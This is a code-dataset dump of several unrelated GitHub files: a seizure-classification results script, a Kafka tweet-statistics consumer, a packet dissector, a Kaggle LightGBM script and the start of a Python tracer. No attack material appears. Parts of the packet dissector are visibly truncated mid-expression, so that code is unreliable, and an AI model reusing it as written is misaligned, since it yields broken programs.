[[0, 0.875]] + list(F1_perc_range)\n # detection delay\n dd_perc_av = [21.6] + list(dd_perc_av)\n dd_perc_std = [17.4] + list(dd_perc_std)\n dd_perc_med = [16.875] + list(dd_perc_med)\n dd_perc_range = [[1, 89]] + list(dd_perc_range)\n else:\n # sensitivity\n det_sens_perc_av = [0.819] + list(det_sens_perc_av)\n det_sens_perc_std = [0.325] + list(det_sens_perc_std)\n det_sens_perc_med = [1] + list(det_sens_perc_med)\n det_sens_perc_range = [[0, 1]] + list(det_sens_perc_range)\n # FP rate\n FP_perc_av = [10.6] + list(FP_perc_av)\n FP_perc_std = [14.6] + list(FP_perc_std)\n FP_perc_med = [5.3] + list(FP_perc_med)\n FP_perc_range = [[0, 75.8]] + list(FP_perc_range)\n # PPV\n PPV_perc_av = [0.203] + list(PPV_perc_av)\n PPV_perc_std = [0.239] + list(PPV_perc_std)\n PPV_perc_med = [0.125] + list(PPV_perc_med)\n PPV_perc_range = [[0, 1]] + list(PPV_perc_range)\n # F1\n F1_perc_av = [0.277] + list(F1_perc_av)\n F1_perc_std = [0.271] + list(F1_perc_std)\n F1_perc_med = [0.166666] + list(F1_perc_med)\n F1_perc_range = [[0, 1]] + list(F1_perc_range)\n # detection delay\n dd_perc_av = [22.2] + list(dd_perc_av)\n dd_perc_std = [18.0] + list(dd_perc_std)\n dd_perc_med = [16.4] + list(dd_perc_med)\n dd_perc_range = [[2, 90]] + list(dd_perc_range)\n else:\n if TRUST_SCORE_FILTERING:\n # sensitivity\n det_sens_perc_av = [0.704] + list(det_sens_perc_av)\n det_sens_perc_std = [0.387] + list(det_sens_perc_std)\n det_sens_perc_med = [1] + list(det_sens_perc_med)\n det_sens_perc_range = [[0, 1]] + list(det_sens_perc_range)\n # FP rate\n FP_perc_av = [2.2] + list(FP_perc_av)\n FP_perc_std = [4.46] + list(FP_perc_std)\n FP_perc_med = [0.576] + list(FP_perc_med)\n FP_perc_range = [[0, 23.6]] + list(FP_perc_range)\n # PPV\n PPV_perc_av = [0.504] + list(PPV_perc_av)\n PPV_perc_std = [0.408] + list(PPV_perc_std)\n PPV_perc_med = [0.3333] + list(PPV_perc_med)\n PPV_perc_range = [[0, 1]] + list(PPV_perc_range)\n # F1\n F1_perc_av = [0.517] + list(F1_perc_av)\n F1_perc_std = [0.370] + list(F1_perc_std)\n F1_perc_med = [0.5] + list(F1_perc_med)\n F1_perc_range = [[0, 1]] + list(F1_perc_range)\n # detection delay\n dd_perc_av = [21.3] + list(dd_perc_av)\n dd_perc_std = [11.9] + list(dd_perc_std)\n dd_perc_med = [19.7] + list(dd_perc_med)\n dd_perc_range = [[3, 56]] + list(dd_perc_range)\n else:\n # sensitivity\n det_sens_perc_av = [0.641] + list(det_sens_perc_av)\n det_sens_perc_std = [0.415] + list(det_sens_perc_std)\n det_sens_perc_med = [1] + list(det_sens_perc_med)\n det_sens_perc_range = [[0, 1]] + list(det_sens_perc_range)\n # FP rate\n FP_perc_av = [2.9] + list(FP_perc_av)\n FP_perc_std = [5.6] + list(FP_perc_std)\n FP_perc_med = [1.2] + list(FP_perc_med)\n FP_perc_range = [[0, 31.5]] + list(FP_perc_range)\n # PPV\n PPV_perc_av = [0.389] + list(PPV_perc_av)\n PPV_perc_std = [0.389] + list(PPV_perc_std)\n PPV_perc_med = [0.231] + list(PPV_perc_med)\n PPV_perc_range = [[0, 1]] + list(PPV_perc_range)\n # F1\n F1_perc_av = [0.397] + list(F1_perc_av)\n F1_perc_std = [0.342] + list(F1_perc_std)\n F1_perc_med = [0.316] + list(F1_perc_med)\n F1_perc_range = [[0, 1]] + list(F1_perc_range)\n # detection delay\n dd_perc_av = [22.1] + list(dd_perc_av)\n dd_perc_std = [13.2] + list(dd_perc_std)\n dd_perc_med = [19.3] + list(dd_perc_med)\n dd_perc_range = [[2, 55]] + list(dd_perc_range)\n\n\n final_array_results = '/result_arrays/'\n\n if SVM_DISTANCES:\n str_save_1 = '_svm_'\n else:\n str_save_1 = '_trust_'\n if REMOVE_ONLY_NOSEIZURE:\n str_save_2 = 'noseize_'\n else:\n str_save_2 = 'all_'\n if SAME_PERCENTILE:\n str_save_3 = 'perc_'\n else:\n str_save_3 = 'thres_'\n if AIMII_SVM_MODEL:\n str_save_4 = str(p_low_trust) + '_aimII'\n else:\n str_save_4 = str(p_low_trust) # + '_' + str(a_temp_scaling)\n if TRAIN_LABELS_TRUST:\n str_save_4 = str_save_4 + '_trust_aimIItrain'\n str_save_5 = '_wtrust'\n\n\n # uncomment this for counting the number and average length of the deferred segments\n perc_removed_str = 'perc_removed_nseg_' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # seg_length mean str\n seg_mean_str = 'seg' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # seg_length std str\n seg_std_str = 'seg_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # n_seg string\n seg_number_str = 'nseg_' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n af.save_with(final_array_results + perc_removed_str, perc_removed_arr)\n af.save_with(final_array_results + seg_mean_str, mean_seg_length)\n af.save_with(final_array_results + seg_std_str, std_seg_length)\n af.save_with(final_array_results + seg_number_str, n_seg_per_day)\n\n\n if TRUST_SCORE_FILTERING:\n perc_removed_str = 'perc_removed' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n # mean str\n sens_mean_str = 'sens' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fprate_mean_str = 'FPrate' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fone_mean_str = 'F1' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n ppv_mean_str = 'PPV' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n det_delay_mean_str = 'ddelay' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n # std str\n sens_std_str = 'sens_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fprate_std_str = 'FPrate_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fone_std_str = 'F1_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n ppv_std_str = 'PPV_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n det_delay_std_str = 'ddelay_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n # median str\n sens_med_str = 'sens_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fprate_med_str = 'FPrate_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fone_med_str = 'F1_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n ppv_med_str = 'PPV_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n det_delay_med_str = 'ddelay_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n # range str\n sens_range_str = 'sens_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fprate_range_str = 'FPrate_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fone_range_str = 'F1_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n ppv_range_str = 'PPV_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n det_delay_range_str = 'ddelay_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n else:\n perc_removed_str = 'perc_removed' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # mean str\n sens_mean_str = 'sens' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fprate_mean_str = 'FPrate' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fone_mean_str = 'F1' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n ppv_mean_str = 'PPV' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n det_delay_mean_str = 'ddelay' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # std str\n sens_std_str = 'sens_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fprate_std_str = 'FPrate_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fone_std_str = 'F1_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n ppv_std_str = 'PPV_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n det_delay_std_str = 'ddelay_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # median str\n sens_med_str = 'sens_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fprate_med_str = 'FPrate_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fone_med_str = 'F1_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n ppv_med_str = 'PPV_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n det_delay_med_str = 'ddelay_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # range str\n sens_range_str = 'sens_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fprate_range_str = 'FPrate_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fone_range_str = 'F1_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n ppv_range_str = 'PPV_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n det_delay_range_str = 'ddelay_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n\n # CHANGE\n # af.save_with(final_array_results + perc_removed_str, perc_removed_arr)\n # # mean arrays\n # af.save_with(final_array_results + sens_mean_str, det_sens_perc_av)\n # af.save_with(final_array_results + fprate_mean_str, FP_perc_av)\n # af.save_with(final_array_results + fone_mean_str, F1_perc_av)\n # af.save_with(final_array_results + ppv_mean_str, PPV_perc_av)\n # af.save_with(final_array_results + det_delay_mean_str, dd_perc_av)\n # # std arrays\n # af.save_with(final_array_results + sens_std_str, det_sens_perc_std)\n # af.save_with(final_array_results + fprate_std_str, FP_perc_std)\n # af.save_with(final_array_results + fone_std_str, F1_perc_std)\n # af.save_with(final_array_results + ppv_std_str, PPV_perc_std)\n # af.save_with(final_array_results + det_delay_std_str, dd_perc_std)\n # # median arrays\n # af.save_with(final_array_results + sens_med_str, det_sens_perc_med)\n # af.save_with(final_array_results + fprate_med_str, FP_perc_med)\n # af.save_with(final_array_results + fone_med_str, F1_perc_med)\n # af.save_with(final_array_results + ppv_med_str, PPV_perc_med)\n # af.save_with(final_array_results + det_delay_med_str, dd_perc_med)\n # # range arrays\n # af.save_with(final_array_results + sens_range_str, det_sens_perc_range)\n # af.save_with(final_array_results + fprate_range_str, FP_perc_range)\n # af.save_with(final_array_results + fone_range_str, F1_perc_range)\n # af.save_with(final_array_results + ppv_range_str, PPV_perc_range)\n # af.save_with(final_array_results + det_delay_range_str, dd_perc_range)\n\n time_end_all = time.time()\n print(\"total calculation time: \" + \"%.2f\" % ((time_end_all - time_start_all) / 60.) + ' minutes')\n print('')\n","repo_name":"thijsrmbecker/classify_w_deferral_seizure","sub_path":"classification_w_deferral/classify_w_defer_function.py","file_name":"classify_w_defer_function.py","file_ext":"py","file_size_in_byte":39806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19546948401","text":"import json\nfrom json import loads\nimport datetime \n\nfrom kafka import KafkaConsumer, TopicPartition\n\nfrom upload_data import upload\n\n\ndata = {}\n\ndef main():\n consumer = KafkaConsumer(\n bootstrap_servers=[':9092', ':9092', ':9092'],\n auto_offset_reset='earliest',\n enable_auto_commit=True)\n\n resubscribe(consumer)\n\n try:\n all_accounts = get_all_acounts(consumer)\n\n data['accounts'] = []\n data['accounts'].append(list(all_accounts))\n print(\"get_all_acounts LOADED\")\n except Exception as e:\n print(\"get_all_acounts FAILED\")\n print(e)\n\n\n try:\n get_tweets_for_top_10_accounts(consumer) \n print(\"get_tweets_for_top_10_accounts LOADED\")\n except Exception as e:\n print(\"get_tweets_for_top_10_accounts FAILED\")\n print(e)\n\n try:\n get_top_20_accounts(consumer,1)\n print(\"get_top_20_accounts LOADED\")\n except Exception as e:\n print(\"get_top_20_accounts FAILED\")\n print(e)\n \n try:\n get_aggregated_statistics(consumer)\n print(\"get_aggregated_statistics LOADED\")\n except Exception as e:\n print(\"get_aggregated_statistics FAILED\")\n print(e)\n\n with open('data.json', 'w') as outfile:\n json.dump(data, outfile)\n\n #upload('data.json')\n\n consumer.close()\n\n\ndef resubscribe(consumer):\n all_topics = consumer.topics()\n consumer.subscribe(topics=list(all_topics))\n\n\ndef get_all_acounts(consumer):\n all_topics = consumer.topics()\n\n return all_topics\n\n\ndef get_tweets_for_top_10_accounts(consumer):\n resubscribe(consumer)\n all_topics = get_all_acounts(consumer)\n\n top10 = []\n start_date = datetime.datetime.timestamp(datetime.datetime.now() - datetime.timedelta(hours=3))\n\n for topic in all_topics:\n tp = TopicPartition(topic, 0)\n consumer.seek_to_end(tp)\n last_offset = int(consumer.position(tp))\n\n offset = consumer.offsets_for_times({tp: start_date})\n\n start_offset = 0\n if list(offset.values())[0]:\n start_offset = int(list(offset.values())[0].offset)\n \n\n top10.append({'user_id' : topic, 'amount' : int(last_offset - start_offset), 'length' : last_offset})\n\n\n sorted(top10, key = lambda x: x['amount'])\n top10 = top10[:10]\n\n data['top10_producing_account_latest_tweets'] = []\n\n for topic in top10:\n tp = TopicPartition(topic['user_id'], 0)\n\n if topic['length'] >= 10:\n consumer.seek(tp, topic['length'] - 10)\n else:\n consumer.seek_to_beginning(tp)\n\n messages = consumer.poll(2000,10)\n messages = list(messages.values())\n\n tweets = []\n\n for message in messages:\n tweets.append(message[0].value.decode(\"utf-8\"))\n\n print(tweets)\n\n data['top10_producing_account_latest_tweets'].append(\n {\n 'user_id' : topic['user_id'], \n 'latest_tweets' : tweets\n })\n\n\n \n\n\ndef get_top_20_accounts(consumer, n):\n resubscribe(consumer)\n all_topics = get_all_acounts(consumer)\n\n data[\"top20_producing_accounts\"] = []\n\n top20 = []\n start_date = datetime.datetime.timestamp(datetime.datetime.now() - datetime.timedelta(hours=n))\n\n for topic in all_topics:\n tp = TopicPartition(topic, 0)\n consumer.seek_to_end(tp)\n last_offset = int(consumer.position(tp))\n\n offset = consumer.offsets_for_times({tp: start_date})\n\n start_offset = 0\n if list(offset.values())[0]:\n start_offset = int(list(offset.values())[0].offset)\n \n\n top20.append({'user_id' : topic, 'amount' : int(last_offset - start_offset)})\n\n\n sorted(top20, key = lambda x: x['amount'])\n top20 = top20[:20]\n\n print(top20)\n \n for account in top20:\n data[\"top20_producing_accounts\"].append(account)\n\ndef get_aggregated_statistics(consumer):\n resubscribe(consumer)\n all_topics = get_all_acounts(consumer)\n data['aggregated_statistics'] = []\n\n hour_before_1 = datetime.datetime.timestamp(datetime.datetime.now() - datetime.timedelta(hours=1))\n hour_before_2 = datetime.datetime.timestamp(datetime.datetime.now() - datetime.timedelta(hours=1))\n hour_before_3 = datetime.datetime.timestamp(datetime.datetime.now() - datetime.timedelta(hours=3))\n\n for topic in all_topics:\n tp = TopicPartition(topic, 0)\n consumer.seek_to_end(tp)\n last_offset = consumer.position(tp)\n\n offset_1_hour_before = consumer.offsets_for_times({tp: hour_before_1})\n offset_2_hour_before = consumer.offsets_for_times({tp: hour_before_2})\n offset_3_hour_before = consumer.offsets_for_times({tp: hour_before_3})\n\n start_minus_1 = 0\n start_minus_2 = 0\n start_minus_3 = 0\n\n if list(offset_1_hour_before.values())[0]:\n start_minus_1 = list(offset_1_hour_before.values())[0].offset\n\n if list(offset_2_hour_before.values())[0]:\n start_minus_2 = list(offset_2_hour_before.values())[0].offset\n\n if list(offset_3_hour_before.values())[0]:\n start_minus_3 = list(offset_3_hour_before.values())[0].offset\n\n data['aggregated_statistics'].append(\n {\n 'user_id' : topic, \n '1 hour before' : last_offset - start_minus_1, \n '2 hours before' : start_minus_1 - start_minus_2,\n '3 hours before' : start_minus_2 - start_minus_3\n })\n \n \n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"yatskivkath/Big-Data-2021-Apache-Kafka","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":5568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17339521072","text":"#!/usr/bin/env python3\nimport os\nimport binascii\nimport sys\nimport slotlib\nimport textwrap\nimport struct\nimport time\n# dissects capture logs and outputs a list of packets\ndatastream = []\nprefixes = lambda y: [y[:x] for x in range(1, len(y)+1)]\nrealtime = False\n\nignored_dataids = []\nignored_datastr = os.getenv(\"CAPLOG_IGNORE_IDS\")\nif ignored_datastr:\n ignored_dataids = [int(x, 16) for x in ignored_datastr.split()]\n print(f\"NOTE: ignoring data ids {', '.join(hex(x) for x in ignored_dataids)}\")\n\ncsum_trailer = 0\nif os.getenv(\"CAPLOG_NO_CSUM\"):\n csum_trailer = 0\n\nif len(sys.argv) < 3:\n print(\"usage: {} [logicexport,simlog,realtime] \")\n exit(1)\n\nif sys.argv[1] in prefixes(\"logicexport\"):\n with open(sys.argv[2]) as f:\n f.readline()\n flag = False\n\n for i in f.readlines():\n i = i.rstrip('\\n')\n row = i.split(',')\n\n if row[2] or row[3]: continue\n v = int(row[1][2:], base=16)\n if not flag and v not in (0xa6, 0xa5):\n continue\n flag = True\n datastream.append(v)\nelif sys.argv[1] in prefixes(\"simlog\"):\n with open(sys.argv[2], 'rb') as f:\n datastream = [x for x in f.read()]\nelif sys.argv[1] in prefixes(\"realtime\"):\n realtime = True\nelse:\n print(\"usage: {} [logicexport,simlog,realtime] \")\n exit(1)\n\nptr = 0\nif not realtime:\n def read_buf(x):\n global ptr\n ptr += x\n if ptr > len(datastream):\n exit()\n return bytes(datastream[ptr-x:ptr])\n\n def read():\n header = bytearray(read_buf(3))\n while header[0] not in (0xa5, 0xa6):\n header[0:1] = header[1:2]\n header[2] = read_buf(1)[0]\n yield bytes(header) + read_buf(header[1]+csum_trailer)\nelse:\n files = [open(x, 'rb') for x in sys.argv[2:]]\n import select\n\n def read_exact(f, x):\n buf = bytearray()\n while len(buf) < x:\n buf += os.read(f.fileno(), x-len(buf))\n if len(buf) < x: time.sleep(0.01)\n return buf\n \n def read():\n (ok, _, _) = select.select(files, [], [])\n for f in ok:\n header = read_exact(f, 3)\n while header[0] not in (0xa5, 0xa6):\n print(\"??? : {:02x}\".format(header[0]))\n header[0:1] = header[1:2]\n header[2] = read_exact(f, 1)[0]\n yield bytes(header + read_exact(f, header[1]+csum_trailer))\n\npnames = {\n 0x10: \"HANDSHAKE_INIT\",\n 0x11: \"HANDSHAKE_RESP\",\n 0x12: \"HANDSHAKE_OK\",\n 0x13: \"HANDSHAKE_UOK\",\n 0x20: \"DATA_TEMP\",\n 0x21: \"DATA_FULFILL\",\n 0x22: \"DATA_RETRIEVE\",\n 0x23: \"DATA_REQUEST\",\n 0x24: \"DATA_SET_SIZE\",\n 0x25: \"DATA_STORE\",\n 0x30: \"ACK_DATA_TEMP\",\n 0x31: \"ACK_DATA_FULFILL\",\n 0x32: \"ACK_DATA_RETRIEVE\",\n 0x33: \"ACK_DATA_REQUEST\",\n 0x34: \"ACK_DATA_SET_SIZE\",\n 0x35: \"ACK_DATA_STORE\",\n 0x40: \"QUERY_TIME\",\n 0x50: \"RESET\",\n 0x51: \"PING\",\n 0x52: \"PONG\",\n 0x60: \"UPDATE_CMD\",\n 0x61: \"UPDATE_IMG_DATA\",\n 0x62: \"UPDATE_IMG_START\",\n 0x63: \"UPDATE_STATUS\",\n 0x70: \"CONSOLE_MSG\",\n 0x80: \"REFRESH_GRABBER\",\n 0x81: \"SLEEP_ENABLE\"\n}\n\npktcolors = {\n \"HANDSHAKE\": 82,\n \"QUERY_TIME\": 225,\n \"PING\": 245,\n \"PONG\": 245,\n \"RESET\": 226,\n \"CONSOLE\": 238,\n \"DATA_TEMP\": 93,\n \"DATA_SET_SIZE\": 93,\n \"DATA_FULFILL\": 45,\n \"DATA_REQUEST\": 101,\n \"DATA_STORE\": 196,\n \"DATA_RETRIEVE\": 208\n}\n\nheader_width = 5 + 2 + 2 + 2 + 2 + 20 + 2\n\ntempcodes = {\n 0b11: \"Hot\",\n 0b10: \"Warm\",\n 0b01: \"ColdWantsWarm\",\n 0b00: \"Cold\"\n}\n\nslot_temps = {}\nslot_databufs = {}\n\njust_restarted = True\n\ndef data_temp(dat, from_esp):\n slotid, tempcode = struct.unpack(\"= 512:\n print(textwrap.indent(st.get_formatted(st.parse(slot_databufs[slotid]), (offs + len(dat) - 6 - totalupd), (offs + len(dat) - 6)), ' ' * (header_width + 2) + '└'))\n else:\n print(textwrap.indent(st.get_formatted(st.parse(slot_databufs[slotid])), ' ' * (header_width + 2) + '└'))\n\nupdrescode = {\n 0: \"Ok\",\n 1: \"NotEnoughSpace_TryAgain\",\n 2: \"NotEnoughSpace_Failed\",\n 0x10: \"IllegalState\",\n 0x11: \"NAK\",\n 0xff: \"Timeout\"\n}\n\ndef ack_data_update(dat, from_esp, is_move):\n slotid, upds, updl, code = struct.unpack(\" totallen:\n slot_databufs[slotid] = slot_databufs[slotid][:totallen]\n else:\n slot_databufs[slotid] += bytearray(totallen - len(slot_databufs[slotid]))\n \n print(f\": data size change for {slotid:03x} ({slotlib.slot_types[slotid][0]}) to {totallen} (0x{totallen:04x})\")\n\ndef ack_data_chsize(dat, from_esp):\n slotid, totallen = struct.unpack(\" 0.05:\n if delta < 2:\n print(\" +{}ms\".format(int(delta*1000)))\n else:\n print(\" +{:.02f}s\".format(delta))\n\n\n if pkt[2] in pnames:\n for j, i in pktcolors.items():\n if j in pnames[pkt[2]]:\n print('\\x1b[38;5;{}m'.format(i), end=\"\")\n if \"ACK\" in pnames[pkt[2]]:\n print('\\x1b[1m', end=\"\")\n\n if pkt[0] == 0xa6:\n print('E->S ', end='')\n elif pkt[0] == 0xa5:\n print('S->E ', end='')\n else:\n print(' UNK ', end='')\n\n if pkt[2] not in pnames:\n print(f\": {pkt[0]:02x}{pkt[1]:02x}{pkt[2]:02x} \")\n continue\n\n print(\": 0x{:02x} ({:20}) \\x1b[0m\".format(pkt[2], pnames[pkt[2]]), end=\"\")\n\n\n if pkt[1] == 0x00:\n print()\n continue\n if pkt[1] == 0x01 and pkt[2] not in phandle:\n print(\": {:02x}\".format(pkt[3]))\n else:\n if pkt[2] in phandle:\n try:\n phandle[pkt[2]](pkt[3:], pkt[0] == 0xa6)\n except:\n print(\"error decoding \" + binascii.hexlify(pkt[3:]).decode(\"ascii\"))\n else:\n print(\"? \" + binascii.hexlify(pkt[3:]).decode(\"ascii\"))\n","repo_name":"mincrmatt12/MSign","sub_path":"caplog/dissect.py","file_name":"dissect.py","file_ext":"py","file_size_in_byte":11958,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"7067766770","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.metrics import roc_auc_score\n\nimport lightgbm as lgb\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport warnings\n# warnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.filterwarnings('ignore')\n\nplt.style.use('seaborn')\nsns.set(font_scale=1)\n\nrandom_state = 0\nnp.random.seed(random_state)\ntrain_df = pd.read_csv('./train.csv')\ntest_df = pd.read_csv('./test.csv')\n\ntest_val = test_df.drop(['ID_code'], axis=1).values\nunique_samples = []\n\n# For each feature, identify the unique values in test_df\nunique_count = np.zeros_like(test_val)\nfor feature in range(test_val.shape[1]):\n _, index, count = np.unique(test_val[:, feature], return_counts=True,\n return_index=True)\n unique_count[index[count == 1], feature] += 1\n\n# Samples in test that have unique values are real, the others are fake\n# The fake data is not taken into account for the evaluation of n_occurrences\nreal_samples_indexes = np.argwhere(np.sum(unique_count, axis=1) > 0)[:, 0]\nsynthetic_samples_indexes = \\\n np.argwhere(np.sum(unique_count, axis=1) == 0)[:, 0]\n\nprint(f'There are {len(real_samples_indexes)} real test samples.')\nprint(f'There are {len(synthetic_samples_indexes)} synthetic test samples.')\nreal_test_df = test_df.iloc[real_samples_indexes]\n\nfeatures = [c for c in train_df.columns if c not in ['target', 'ID_code']]\n\ndata_df = pd.concat([train_df, real_test_df], ignore_index=True)\n\n# feature engineering:\n# use the distribution of occurrences of distinct values for each feature\n# A new feature is defined for each original feature:\n# var -> occ_var = n. of occurrences of corresponding value in the whole set\nfor var in features:\n feature = data_df[var]\n n_occurrences = feature.value_counts()[feature].values\n train_df['occ_' + var] = n_occurrences[:len(train_df)]\n test_occ = np.zeros(len(test_df))\n test_occ[real_samples_indexes] = n_occurrences[-len(real_test_df):]\n test_df['occ_' + var] = test_occ\n\n\noriginal_features = features\nfeatures = [c for c in train_df.columns if c not in ['target', 'ID_code']]\n\n\nlgb_params = {\n \"objective\": \"binary\",\n \"metric\": \"auc\",\n \"boosting\": 'gbdt',\n \"max_depth\": -1,\n \"num_leaves\": 13,\n \"learning_rate\": 0.01,\n # \"bagging_freq\": 5,\n # \"bagging_fraction\": 0.4,\n # \"feature_fraction\": 0.05,\n # use 1.0 with the new features!!\n \"feature_fraction\": 1.0,\n \"min_data_in_leaf\": 80,\n \"min_sum_hessian_in_leaf\": 10,\n \"tree_learner\": \"serial\",\n \"boost_from_average\": \"false\",\n # \"lambda_l1\": 5,\n # \"lambda_l2\": 5,\n \"bagging_seed\": random_state,\n \"verbosity\": 1,\n \"seed\": random_state,\n \"num_threads\": 8\n}\n\nn_splits = 7\nn_loops = 3\nskf = StratifiedKFold(n_splits=n_splits, shuffle=True,\n random_state=random_state)\noof = train_df[['ID_code', 'target']]\noof['predict'] = 0\npredictions = test_df[['ID_code']]\nval_aucs = []\nfeature_importance_df = pd.DataFrame()\n\nX_test = test_df[features]\n\nfor fold, (trn_idx, val_idx) in enumerate(skf.split(train_df,\n train_df['target'])):\n X_train = train_df.iloc[trn_idx][features]\n y_train = train_df.iloc[trn_idx]['target']\n X_valid = train_df.iloc[val_idx][features]\n y_valid = train_df.iloc[val_idx]['target']\n p_valid, p_test = 0, 0\n for i in range(n_loops):\n X_t, y_t = X_train, y_train\n\n trn_data = lgb.Dataset(X_t, label=y_t)\n val_data = lgb.Dataset(X_valid, label=y_valid)\n evals_result = {}\n lgb_clf = lgb.train(\n lgb_params,\n trn_data,\n 100000,\n valid_sets=[trn_data, val_data],\n early_stopping_rounds=3000,\n verbose_eval=1000,\n evals_result=evals_result\n )\n p_valid += lgb_clf.predict(X_valid)\n p_test += lgb_clf.predict(X_test)\n fold_importance_df = pd.DataFrame()\n fold_importance_df[\"feature\"] = features\n fold_importance_df[\"importance\"] = lgb_clf.feature_importance()\n fold_importance_df[\"fold\"] = fold + 1\n feature_importance_df = pd.concat([feature_importance_df,\n fold_importance_df], axis=0)\n oof['predict'][val_idx] = p_valid/n_loops\n val_score = roc_auc_score(y_valid, p_valid)\n val_aucs.append(val_score)\n\n predictions[f'fold{fold+1}'] = p_test/n_loops\n\n\nmean_auc = np.mean(val_aucs)\nstd_auc = np.std(val_aucs)\nall_auc = roc_auc_score(oof['target'], oof['predict'])\nprint(f\"Mean auc: {mean_auc:.5f}, std: {std_auc:.5f}. All auc: {all_auc:.5f}\")\n\ncols = (feature_importance_df[[\"feature\", \"importance\"]]\n .groupby(\"feature\")\n .mean()\n .sort_values(by=\"importance\", ascending=False)[:1000].index)\nbest_features = \\\n feature_importance_df.loc[feature_importance_df.feature.isin(cols)]\n\nplt.figure(figsize=(14, 40))\nsns.barplot(x=\"importance\", y=\"feature\",\n data=best_features.sort_values(by=\"importance\", ascending=False))\nplt.title('LightGBM Features (averaged over folds)')\nplt.tight_layout()\nplt.savefig(f'lgb_importances.png')\n\n# submission\npredictions['target'] = np.mean(\n predictions[[col for col in predictions.columns\n if col not in ['ID_code', 'target']]].values,\n axis=1\n)\n# predictions.to_csv('lgb_all_predictions.csv', index=None)\nsub_df = pd.DataFrame({\"ID_code\": test_df[\"ID_code\"].values})\nsub_df[\"target\"] = predictions['target']\nsub_df.to_csv(f\"lgb_submission.csv\", index=False)\noof.to_csv(f'lgb_oof.csv', index=False)\n","repo_name":"adrienbolens/Kaggle","sub_path":"santander-customer-transaction-prediction/lgb_script.py","file_name":"lgb_script.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38310731354","text":"import imp\nimport sys\nimport bdb # the KEY import here!\nimport re\nimport traceback\nimport types\n\n# TODO: use the 'six' package to smooth out Py2 and Py3 differences\nis_python3 = (sys.version_info[0] == 3)\n\n# NB: don't use cStringIO since it doesn't support unicode!!!\nif is_python3:\n import io as StringIO\n import io # expose regular io for Python3 users too\nelse:\n import StringIO\nimport pg_encoder\n\n\n# upper-bound on the number of executed lines, in order to guard against\n# infinite loops\n#MAX_EXECUTED_LINES = 300\nMAX_EXECUTED_LINES = 1000 # on 2016-05-01, I increased the limit from 300 to 1000 for Python due to popular user demand! and I also improved the warning message\n\n#DEBUG = False\nDEBUG = True\n\nBREAKPOINT_STR = '#break'\n\n# if a line starts with this string, then look for a comma-separated\n# list of variables after the 